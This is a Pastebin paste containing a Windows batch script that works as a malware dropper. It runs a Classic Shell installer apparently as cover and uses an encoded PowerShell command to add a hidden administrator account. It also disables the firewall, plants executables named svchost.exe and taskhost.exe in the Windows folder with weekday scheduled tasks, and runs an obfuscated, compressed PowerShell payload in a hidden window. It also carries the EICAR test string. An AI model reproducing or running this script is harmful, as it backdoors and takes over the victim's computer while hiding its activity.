SHARE
TWEET

Untitled

a guest Feb 18th, 2019 133 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. @shift
  2. #X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  3. @echo off
  4. %myfiles%\ClassicShellSetup_4_3_0.exe
  5. powershell -enc bgBlAHQAIAB1AHMAZQByACAALwBhAGQAZAAgAFMAdQBwAHAAbwByAHQAIABhAGQAbQAxAG4AdABlAHMAdAAxADIAMwA7AG4AZQB0ACAAbABvAGMAYQBsAGcAcgBvAHUAcAAgAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAcwAgAFMAdQBwAHAAbwByAHQAIAAvAGEAZABkAA==
  6. netsh advfirewall set allprofiles state off
  7. copy %myfiles%\taskhost.exe c:\Windows\
  8. at 09:00 /every:"M,T,W,Th,F" c:\Windows\taskhost.exe
  9. copy %myfiles%\svchost.exe c:\Windows\svchost.exe
  10. at 09:00 /every:"M,T,W,Th,F"  c:\Windows\svchost.exe
  11. if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtU+JIEP7Or+hKzVUlJRnCi6ikrFoWz9VTXE9Y3TuKuhqShswyeXEyQZDlv18Hc+h+vS8M3enu5+mep4c9wzl8smqTC6Wu4yzVxraWqBNU7RYPlbKcKWTFTMkAciMMHbg29B2uE3NvNDxKbQqh+kqlgV35VNYPQ415XodCJgbCl5F8xcqYv8VSqTQZb7J3971ODQbG8f83l4FGYXAc0RG+c3mz+8ZoOSsMfiBlRLB8Y3YIJp82B/YH973QIkbCOiTvsaiFSyUWHyPf0K5DasP6VDN6s2UhTdjqfx5c/H755er6j5vb4d3X+z8fRuNvj0/f//pbzIIQ54tI/liqOEmzZ52bYvWy3rx6zVa7c9w9OT2z+DgdREL3tRYb26nNiyQo0SGw2crZgkZT0Bxse0LsJtMpsNWvGfAThijyQqP7dfaDxgzuqIgdTj/wG3jrpueBi89w1nJ279UNbNm8ZG/5Tc7bP+cpNRdEbrovQd+OzoGFE3uBxtUiCdMY3FisZUxVWchvMVmYyJnu/Iofm/sfqiNsIdNpQKOG7USURKdsTXD0cwTsn50PmIREYU3sc1JDhQtbO8GX/4yHPa7DE9KC7ex2HwAWWyDGYDN57vlMgqsMdDv07+jI2bKIkIzPliVgSAjoA1QNUooCSXyXFJeXAVHJSPkg52DTzHPHgcPUKYJgK8M6W33/ZlGbkzs0fIR6JQO8T+lahiIRC9TTXq/0oh6gNnIuaRPwUSgZ7uU0EErNSJaEuWVGF7jzWUzGHTVcXdxokxuMeVn+CWcDJTExfo3F/IqEhzrnJF/bKnLULuElxqqDNUxfpVKiccw9+0nSwF7yu3GXN30yaCLrbsfpZ5lCKngjTeO4fcLbXfvmajy8rSu5xC8YLFNnEOk0xsZxl3u8ddbq8NOTkZgLLasEy/FZQmQXPkw+bwzuhZiV44v5RfqSqFSEF8II24qMyfJeo9E8a/Fm95Q3efO00+t02g2WWODUWEpZ1IdbvhCkKYxnqC9wLhO5v1n2DO4dbSRY1EC7ZYGbkJVnIkDYey4rDeTgZiLPTaSLGlufs7TX++XF8uosq3Ra99Ztz/Po6HiOP6nG/FAkRsbIacFRp1l1oTkfCp1HQtFtDtJsY7OsDl4dJm/vwNRma9o/Mtot23HqcAApW6OUjw8VIdbZul4eXrmnaWHcpFAktv1j5I4UYkbrikFK23Da7XjejkQTRNvdvw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtU+JIEP7Or+hKzVUlJRnCi6ikrFoWz9VTXE9Y3TuKuhqShswyeXEyQZDlv18Hc+h+vS8M3enu5+mep4c9wzl8smqTC6Wu4yzVxraWqBNU7RYPlbKcKWTFTMkAciMMHbg29B2uE3NvNDxKbQqh+kqlgV35VNYPQ415XodCJgbCl5F8xcqYv8VSqTQZb7J3971ODQbG8f83l4FGYXAc0RG+c3mz+8ZoOSsMfiBlRLB8Y3YIJp82B/YH973QIkbCOiTvsaiFSyUWHyPf0K5DasP6VDN6s2UhTdjqfx5c/H755er6j5vb4d3X+z8fRuNvj0/f//pbzIIQ54tI/liqOEmzZ52bYvWy3rx6zVa7c9w9OT2z+DgdREL3tRYb26nNiyQo0SGw2crZgkZT0Bxse0LsJtMpsNWvGfAThijyQqP7dfaDxgzuqIgdTj/wG3jrpueBi89w1nJ279UNbNm8ZG/5Tc7bP+cpNRdEbrovQd+OzoGFE3uBxtUiCdMY3FisZUxVWchvMVmYyJnu/Iofm/sfqiNsIdNpQKOG7USURKdsTXD0cwTsn50PmIREYU3sc1JDhQtbO8GX/4yHPa7DE9KC7ex2HwAWWyDGYDN57vlMgqsMdDv07+jI2bKIkIzPliVgSAjoA1QNUooCSXyXFJeXAVHJSPkg52DTzHPHgcPUKYJgK8M6W33/ZlGbkzs0fIR6JQO8T+lahiIRC9TTXq/0oh6gNnIuaRPwUSgZ7uU0EErNSJaEuWVGF7jzWUzGHTVcXdxokxuMeVn+CWcDJTExfo3F/IqEhzrnJF/bKnLULuElxqqDNUxfpVKiccw9+0nSwF7yu3GXN30yaCLrbsfpZ5lCKngjTeO4fcLbXfvmajy8rSu5xC8YLFNnEOk0xsZxl3u8ddbq8NOTkZgLLasEy/FZQmQXPkw+bwzuhZiV44v5RfqSqFSEF8II24qMyfJeo9E8a/Fm95Q3efO00+t02g2WWODUWEpZ1IdbvhCkKYxnqC9wLhO5v1n2DO4dbSRY1EC7ZYGbkJVnIkDYey4rDeTgZiLPTaSLGlufs7TX++XF8uosq3Ra99Ztz/Po6HiOP6nG/FAkRsbIacFRp1l1oTkfCp1HQtFtDtJsY7OsDl4dJm/vwNRma9o/Mtot23HqcAApW6OUjw8VIdbZul4eXrmnaWHcpFAktv1j5I4UYkbrikFK23Da7XjejkQTRNvdvw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top